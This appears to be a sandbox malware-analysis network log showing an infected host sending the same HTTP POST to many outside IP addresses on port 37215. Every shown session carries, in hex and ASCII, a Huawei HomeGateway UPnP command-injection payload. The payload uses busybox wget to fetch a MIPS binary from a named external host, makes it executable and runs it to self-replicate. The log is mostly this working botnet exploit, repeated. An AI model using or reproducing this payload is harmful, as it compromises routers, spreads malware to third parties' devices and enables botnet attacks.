                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  571192.168.2.1356280197.227.216.23837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321733952 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  572192.168.2.134493641.164.198.20837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321754932 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  573192.168.2.1337358157.193.106.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321772099 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  574192.168.2.1347900136.4.233.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325386047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  575192.168.2.1348418197.230.151.15637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325400114 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  576192.168.2.1360226157.185.221.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325431108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  577192.168.2.1354038155.195.126.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325452089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  578192.168.2.133289041.178.211.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325550079 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  579192.168.2.1336276142.202.186.10137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325577974 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  580192.168.2.133359841.38.252.10637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.325629950 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 